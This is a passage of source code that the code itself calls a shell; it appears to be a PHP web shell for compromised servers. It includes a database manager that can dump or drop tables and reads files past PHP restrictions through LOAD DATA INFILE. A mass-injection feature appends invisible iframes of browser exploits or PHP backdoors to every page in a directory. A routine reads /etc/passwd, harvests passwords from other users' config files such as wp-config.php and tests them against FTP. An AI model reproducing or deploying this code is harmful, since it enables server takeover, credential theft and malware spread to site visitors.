<input type="hidden" name="sql_x" value="dump"> | |
<input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"> | |
<input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"> | |
<input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"> | |
<input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>"><input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table> | |
<?php | |
if (!empty($sql_x)) {echo "<hr size=\"1\" noshade>";} | |
if ($sql_x == "newtbl") { | |
echo "<b>"; | |
if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) { | |
echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>"; | |
} | |
else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} | |
} | |
elseif ($sql_x == "dump") { | |
if (empty($submit)) { | |
$diplay = FALSE; | |
echo "<form method=\"GET\"><input type=\"hidden\" name=\"x\" value=\"sql\"><input type=\"hidden\" name=\"sql_x\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>"; | |
echo "<b>DB:</b> <input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>"; | |
$v = join (";",$dmptbls); | |
echo "<b>Only tables (explode \";\") <b><sup>1</sup></b>:</b> <input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>"; | |
if ($dump_file) {$tmp = $dump_file;} | |
else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} | |
echo "<b>File:</b> <input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>"; | |
echo "<b>Download: </b> <input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>"; | |
echo "<b>Save to file: </b> <input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>"; | |
echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty"; | |
echo "</form>"; | |
} | |
else { | |
$diplay = TRUE; | |
$set = array(); | |
$set["sock"] = $sql_sock; | |
$set["db"] = $sql_db; | |
$dump_out = "download"; | |
$set["print"] = 0; | |
$set["nl2br"] = 0; | |
$set[""] = 0; | |
$set["file"] = $dump_file; | |
$set["add_drop"] = TRUE; | |
$set["onlytabs"] = array(); | |
if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} | |
$ret = mysql_dump($set); | |
if ($sql_dump_download) { | |
@ob_clean(); | |
header("Content-type: application/octet-stream"); | |
header("Content-length: ".strlen($ret)); | |
header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); | |
echo $ret; | |
exit; | |
} | |
elseif ($sql_dump_savetofile) { | |
$fp = fopen($sql_dump_file,"w"); | |
if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} | |
else { | |
fwrite($fp,$ret); | |
fclose($fp); | |
echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>."; | |
} | |
} | |
else {echo "<b>Dump: nothing to do!</b>";} | |
} | |
} | |
if ($diplay) { | |
if (!empty($sql_tbl)) { | |
if (empty($sql_tbl_x)) {$sql_tbl_x = "browse";} | |
$count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); | |
$count_row = mysql_fetch_array($count); | |
mysql_free_result($count); | |
$tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); | |
$tbl_struct_fields = array(); | |
while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} | |
if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} | |
if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} | |
if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} | |
if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} | |
$perpage = $sql_tbl_le - $sql_tbl_ls; | |
if (!is_numeric($perpage)) {$perpage = 10;} | |
$numpages = $count_row[0]/$perpage; | |
$e = explode(" ",$sql_order); | |
if (count($e) == 2) { | |
if ($e[0] == "d") {$asc_desc = "DESC";} | |
else {$asc_desc = "ASC";} | |
$v = "ORDER BY `".$e[1]."` ".$asc_desc." "; | |
} | |
else {$v = "";} | |
$query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; | |
$result = mysql_query($query) or print(mysql_smarterror()); | |
echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>"; | |
echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_x=structure\">[<b> Structure </b>]</a> "; | |
echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_x=browse\">[<b> Browse </b>]</a> "; | |
echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_x=tbldump&thistbl=1\">[<b> Dump </b>]</a> "; | |
echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_x=insert\">[ <b>Insert</b> ]</a> "; | |
if ($sql_tbl_x == "structure") {echo "<br><br><b>Coming sooon!</b>";} | |
if ($sql_tbl_x == "insert") { | |
if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} | |
if (!empty($sql_tbl_insert_radio)) { } //Not Ready | |
else { | |
echo "<br><br><b>Inserting row into table:</b><br>"; | |
if (!empty($sql_tbl_insert_q)) { | |
$sql_query = "SELECT * FROM `".$sql_tbl."`"; | |
$sql_query .= " WHERE".$sql_tbl_insert_q; | |
$sql_query .= " LIMIT 1;"; | |
$result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror()); | |
$values = mysql_fetch_assoc($result); | |
mysql_free_result($result); | |
} | |
else {$values = array();} | |
echo "<form method=\"POST\"><table width=\"1%\" border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>"; | |
foreach ($tbl_struct_fields as $field) { | |
$name = $field["Field"]; | |
if (empty($sql_tbl_insert_q)) {$v = "";} | |
echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>"; | |
$i++; | |
} | |
echo "</table><br>"; | |
echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>"; | |
if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";} | |
echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>"; | |
} | |
} | |
if ($sql_tbl_x == "browse") { | |
$sql_tbl_ls = abs($sql_tbl_ls); | |
$sql_tbl_le = abs($sql_tbl_le); | |
echo "<hr size=\"1\" noshade>"; | |
echo "<img src=\"".$surl."x=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\"> "; | |
$b = 0; | |
for($i=0;$i<$numpages;$i++) { | |
if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";} | |
echo $i; | |
if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";} | |
if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";} | |
else {echo " ";} | |
} | |
if ($i == 0) {echo "empty";} | |
echo "<form method=\"GET\"><input type=\"hidden\" name=\"x\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b> <input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\"> <b>To:</b> <input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\"> <input type=\"submit\" value=\"View\"></form>"; | |
echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>"; | |
echo "<tr>"; | |
echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>"; | |
for ($i=0;$i<mysql_num_fields($result);$i++) { | |
$v = mysql_field_name($result,$i); | |
if ($e[0] == "a") {$s = "d"; $m = "asc";} | |
else {$s = "a"; $m = "desc";} | |
echo "<td>"; | |
if (empty($e[0])) {$e[0] = "a";} | |
if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";} | |
else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."x=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";} | |
echo "</td>"; | |
} | |
echo "<td><font color=\"green\"><b>Action</b></font></td>"; | |
echo "</tr>"; | |
while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) { | |
echo "<tr>"; | |
$w = ""; | |
$i = 0; | |
foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} | |
if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} | |
echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>"; | |
$i = 0; | |
foreach ($row as $k=>$v) | |
{ | |
$v = htmlspecialchars($v); | |
if ($v == "") {$v = "<font color=\"green\">NULL</font>";} | |
echo "<td>".$v."</td>"; | |
$i++; | |
} | |
echo "<td>"; | |
echo "<a href=\"".$sql_surl."sql_x=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."x=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a> "; | |
echo "<a href=\"".$sql_surl."sql_tbl_x=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."x=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a> "; | |
echo "</td>"; | |
echo "</tr>"; | |
} | |
mysql_free_result($result); | |
echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."x=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_x\">"; | |
echo "<option value=\"\">With selected:</option>"; | |
echo "<option value=\"deleterow\">Delete</option>"; | |
echo "</select> <input type=\"submit\" value=\"Confirm\"></form></p>"; | |
} | |
} | |
else { | |
$result = mysql_query("SHOW TABLE STATUS", $sql_sock); | |
if (!$result) {echo mysql_smarterror();} | |
else | |
{ | |
echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>"; | |
$i = 0; | |
$tsize = $trows = 0; | |
while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) | |
{ | |
$tsize += $row["Data_length"]; | |
$trows += $row["Rows"]; | |
$size = view_size($row["Data_length"]); | |
echo "<tr>"; | |
echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>"; | |
echo "<td> <a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a> </td>"; | |
echo "<td>".$row["Rows"]."</td>"; | |
echo "<td>".$row["Type"]."</td>"; | |
echo "<td>".$row["Create_time"]."</td>"; | |
echo "<td>".$row["Update_time"]."</td>"; | |
echo "<td>".$size."</td>"; | |
echo "<td> <a href=\"".$sql_surl."sql_x=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."x=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a> <a href=\"".$sql_surl."sql_x=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."x=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a> <a href=\"".$sql_surl."sql_tbl_x=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."x=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a> </td>"; | |
echo "</tr>"; | |
$i++; | |
} | |
echo "<tr bgcolor=\"000000\">"; | |
echo "<td><center><b>+</b></center></td>"; | |
echo "<td><center><b>".$i." table(s)</b></center></td>"; | |
echo "<td><b>".$trows."</b></td>"; | |
echo "<td>".$row[1]."</td>"; | |
echo "<td>".$row[10]."</td>"; | |
echo "<td>".$row[11]."</td>"; | |
echo "<td><b>".view_size($tsize)."</b></td>"; | |
echo "<td></td>"; | |
echo "</tr>"; | |
echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."x=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_x\">"; | |
echo "<option value=\"\">With selected:</option>"; | |
echo "<option value=\"tbldrop\">Drop</option>"; | |
echo "<option value=\"tblempty\">Empty</option>"; | |
echo "<option value=\"tbldump\">Dump</option>"; | |
echo "<option value=\"tblcheck\">Check table</option>"; | |
echo "<option value=\"tbloptimize\">Optimize table</option>"; | |
echo "<option value=\"tblrepair\">Repair table</option>"; | |
echo "<option value=\"tblanalyze\">Analyze table</option>"; | |
echo "</select> <input type=\"submit\" value=\"Confirm\"></form></p>"; | |
mysql_free_result($result); | |
} | |
} | |
} | |
} | |
} | |
else { | |
$acts = array("","newdb","serverstatus","servervars","processes","getfile"); | |
if (in_array($sql_x,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="x" value="sql"><input type="hidden" name="sql_x" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20"> <input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="x" value="sql"><input type="hidden" name="sql_x" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>"> <input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php } | |
if (!empty($sql_x)) { | |
echo "<hr size=\"1\" noshade>"; | |
if ($sql_x == "newdb") { | |
echo "<b>"; | |
if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";} | |
else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} | |
} | |
if ($sql_x == "serverstatus") { | |
$result = mysql_query("SHOW STATUS", $sql_sock); | |
echo "<center><b>Server-status variables:</b><br><br>"; | |
echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; | |
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} | |
echo "</table></center>"; | |
mysql_free_result($result); | |
} | |
if ($sql_x == "servervars") { | |
$result = mysql_query("SHOW VARIABLES", $sql_sock); | |
echo "<center><b>Server variables:</b><br><br>"; | |
echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; | |
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} | |
echo "</table>"; | |
mysql_free_result($result); | |
} | |
if ($sql_x == "processes") { | |
if (!empty($kill)) { | |
$query = "KILL ".$kill.";"; | |
$result = mysql_query($query, $sql_sock); | |
echo "<b>Process #".$kill." was killed.</b>"; | |
} | |
$result = mysql_query("SHOW PROCESSLIST", $sql_sock); | |
echo "<center><b>Processes:</b><br><br>"; | |
echo "<TABLE cellSpacing=0 cellPadding=2 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>"; | |
while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_x=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";} | |
echo "</table>"; | |
mysql_free_result($result); | |
} | |
if ($sql_x == "getfile") | |
{ | |
$tmpdb = $sql_login."_tmpdb"; | |
$select = mysql_select_db($tmpdb); | |
if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} | |
if ($select) | |
{ | |
$created = FALSE; | |
mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); | |
mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); | |
$result = mysql_query("SELECT * FROM tmp_file;"); | |
if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";} | |
else | |
{ | |
for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);} | |
$f = ""; | |
while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);} | |
if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";} | |
else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";} | |
mysql_free_result($result); | |
mysql_query("DROP TABLE tmp_file;"); | |
} | |
} | |
mysql_drop_db($tmpdb); | |
} | |
} | |
} | |
} | |
echo "</td></tr></table>"; | |
if ($sql_sock) { | |
$affected = @mysql_affected_rows($sql_sock); | |
if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} | |
echo "<tr><td><center><b>Affected rows : ".$affected."</center></td></tr>"; | |
} | |
echo "</table>"; | |
} | |
if ($x == 'massbrowsersploit') { | |
?> | |
<b>Mass Code Injection:</b><br><br> | |
Use this to add HTML to the end of every .php, .htm, and .html page in the directory specified.<br><br> | |
<form action="<?php echo $surl; ?>" method=GET> | |
<input type=hidden name="masssploit" value="goahead"> | |
<input type=hidden name="act" value="massbrowsersploit"> | |
<table border=0> | |
<tr><td>Dir to inject: </td><td><input type=text size=50 name="pathtomass" value="<?php echo realpath('.'); ?>"> <-- default is dir this shell is in</td></tr> | |
<tr><td>Code to inject: </td><td><textarea name="injectthis" cols=50 rows=4><?php echo htmlspecialchars('<IFRAME src="http://www.google.com" width=0 height=0 frameborder=0></IFRAME>'); ?></textarea> <-- best bet would be to include an invisible iframe of browser exploits</td></tr> | |
<tr><td><input type=submit value="Inject Code"></td></tr> | |
</table> | |
</form> | |
<?php | |
if ($_GET['masssploit'] == 'goahead') { | |
if (is_dir($_GET['pathtomass'])) { | |
$lolinject = $_GET['injectthis']; | |
foreach (glob($_GET['pathtomass']."/*.php") as $injectj00) { | |
$fp=fopen($injectj00,"a+"); | |
if (fputs($fp,$lolinject)){ | |
echo '<font color=green>'.$injectj00.' was injected<br></font>'; | |
} else { | |
echo '<font color=red>failed to inject '.$injectj00.'</font>'; | |
} | |
} | |
foreach (glob($_GET['pathtomass']."/*.htm") as $injectj00) { | |
$fp=fopen($injectj00,"a+"); | |
if (fputs($fp,$lolinject)){ | |
echo $injectj00.' was injected<br>'; | |
} else { | |
echo '<font color=red>failed to inject '.$injectj00.'</font>'; | |
} | |
} | |
foreach (glob($_GET['pathtomass']."/*.html") as $injectj00) { | |
$fp=fopen($injectj00,"a+"); | |
if (fputs($fp,$lolinject)){ | |
echo $injectj00.' was injected<br>'; | |
} else { | |
echo '<font color=red>failed to inject '.$injectj00.'</font>'; | |
} | |
} | |
} else { //end if inputted dir is real -- if not, show an ugly red error | |
echo '<b><font color=red>'.$_GET['pathtomass'].' is not available!</font></b>'; | |
} // end if inputted dir is real, for real this time | |
} // end if confirmation to mass sploit is go | |
//new php backdoor | |
?> | |
<b>Mass Code Injection:</b><br><br> | |
Use this to add PHP to the end of every .php page in the directory specified.<br><br> | |
<form action="<?php echo $surl; ?>" method=GET> | |
<input type=hidden name="masssploit" value="php"> | |
<input type=hidden name="act" value="massbrowsersploit"> | |
<table border=0> | |
<tr><td>Dir to inject: </td><td><input type=text size=50 name="pathtomass" value="<?php echo realpath('.'); ?>"> <-- default is dir this shell is in</td></tr> | |
<tr><td>Code to inject: </td><td><textarea name="injectthis" cols=50 rows=4><?php echo htmlspecialchars('<?php if ($_GET["x"] == "lul") { /*code*/; } ?>'); ?></textarea></td></tr> | |
<tr><td><input type=submit value="Inject Code"></td></tr> | |
</table> | |
</form> | |
<?php | |
if ($_GET['masssploit'] == 'php') { | |
if (is_dir($_GET['pathtomass'])) { | |
$lolinject = $_GET['injectthis']; | |
foreach (glob($_GET['pathtomass']."/*.php") as $injectj00) { | |
$fp=fopen($injectj00,"a+"); | |
if (fputs($fp,$lolinject)){ | |
echo '<font color=green>'.$injectj00.' was injected<br></font>'; | |
} else { | |
echo '<font color=red>failed to inject '.$injectj00.'</font>'; | |
} | |
} | |
} else { //end if inputted dir is real -- if not, show an ugly red error | |
echo '<b><font color=red>'.$_GET['pathtomass'].' is not available!</font></b>'; | |
} // end if inputted dir is real, for real this time | |
} // end if confirmation to mass sploit is php only | |
} // end if massbrowsersploit is called | |
if ($x == 'cpanel'){ | |
if ($_GET['go'] == 'go'){ | |
set_time_limit(0); | |
################## | |
@$passwd=fopen('/etc/passwd','r'); | |
if (!$passwd) { | |
echo "[-] Error : coudn't read /etc/passwd"; | |
exit; | |
} | |
$path_to_public=array(); | |
$users=array(); | |
$pathtoconf=array(); | |
$i=0; | |
while(!feof($passwd)) { | |
$str=fgets($passwd); | |
if ($i>35) { | |
$pos=strpos($str,":"); | |
$username=substr($str,0,$pos); | |
$dirz="/home/$username/public_html/"; | |
if (($username!="")) { | |
if (is_readable($dirz)) { | |
array_push($users,$username); | |
array_push($path_to_public,$dirz); | |
} | |
} | |
} | |
$i++; | |
} | |
################### | |
######################### | |
function read_dir($path,$username) { | |
if ($handle = opendir($path)) { | |
while (false !== ($file = readdir($handle))) { | |
$fpath="$path$file"; | |
if (($file!='.') and ($file!='..')) { | |
if (is_readable($fpath)) { | |
$dr="$fpath/"; | |
if (is_dir($dr)) { | |
read_dir($dr,$username); | |
} | |
else { | |
if (($file=='config.php') or ($file=='config.inc.php') or ($file=='db.inc.php') or ($file=='connect.php') or ($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='db.php') or ($file=='db_connect.php')) { | |
$pass=get_pass($fpath); | |
if ($pass!='') { | |
echo "[+] $fpath\n$pass\n"; | |
ftp_check($username,$pass); | |
} | |
} | |
} | |
} | |
} | |
} | |
} | |
} | |
function get_pass($link) { | |
@$config=fopen($link,'r'); | |
while(!feof($config)) { | |
$line=fgets($config); | |
if (strstr($line,'pass') or strstr($line,'password') or strstr($line,'passwd')) { | |
if (strrpos($line,'"')) | |
$pass=substr($line,(strpos($line,'=')+3),(strrpos($line,'"')-(strpos($line,'=')+3))); | |
else | |
$pass=substr($line,(strpos($line,'=')+3),(strrpos($line,"'")-(strpos($line,'=')+3))); | |
return $pass; | |
} | |
} | |
} | |
function ftp_check($login,$pass) { | |
@$ftp=ftp_connect('127.0.0.1'); | |
if ($ftp) { | |
@$res=ftp_login($ftp,$login,$pass); | |
if ($res) { | |
echo '[cPanel Found] '.$login.':'.$pass." Success\n"; | |
} | |
else ftp_quit($ftp); | |
} | |
} | |
echo "<br><br>"; | |
echo "<textarea name='main_window' cols=100 rows=20>"; | |
echo "[+] Found ".sizeof($users)." entrys in /etc/passwd\n"; | |
echo "[+] Found ".sizeof($path_to_public)." readable public_html directories\n"; | |
echo "[~] Searching for passwords in config.* files...\n\n"; | |
foreach ($users as $user) { | |
$path="/home/$user/public_html/"; | |
read_dir($path,$user); | |
} | |
echo "\n[+] Done\n"; | |
echo "</textarea><br>"; | |
}else | |
echo '<center>Are you sure you would like to search for cPanel accounts on this website/server?<br>Please note this may take a long time to execute depending on the website/server it is run on.<br><br><a href="'.$surl.'x=cpanel&go=go">Yes</a> || <a href="'.$surl.'">No</a></center>'; | |
} | |
if ($x == 'fi'){ | |
?> | |
<b>Install Local RFI/LFI Scanner</b><br> | |
<form action=<?php echo $surl; ?> method=GET> | |
<input type=hidden name="x" value="fi"> | |
<input type=hidden name="install" value="yup"> | |
Path to install in: <input type=text name="path" value="<?php echo $d; ?>"> (must have final /)<br> | |
<input type=submit value="Install"></form> | |
<?php | |
if ($_GET['install'] == 'yup') { | |
if (is_writable($_GET['path'])) { | |
cf($_GET['path'].'fi.pl', $fi); | |
echo '<font color=green><b>fi.pl was created in '.htmlentities($_GET['path']).'</b></font>'; | |
chmod($_GET['path'].'/fi.pl', 0777); | |
echo '<br />To execute, browse to the directory you installed the scanner in and execute it from there using \'perl fi.pl\''; | |
}else{ | |
echo '<font color=red><b>Directory is not writable!</b><br></font>'; | |
} | |
} | |
} | |
if ($x == 'phpproxy'){ | |
?> | |
<b>Install PHP Based Proxy</b><br> | |
<form action=<?php echo $surl; ?> method=GET> | |
<input type=hidden name="x" value="phpproxy"> | |
<input type=hidden name="install" value="yup"> | |
Path to install in: <input type=text name="path" value="<?php echo $d; ?>"> (must have final /)<br> | |
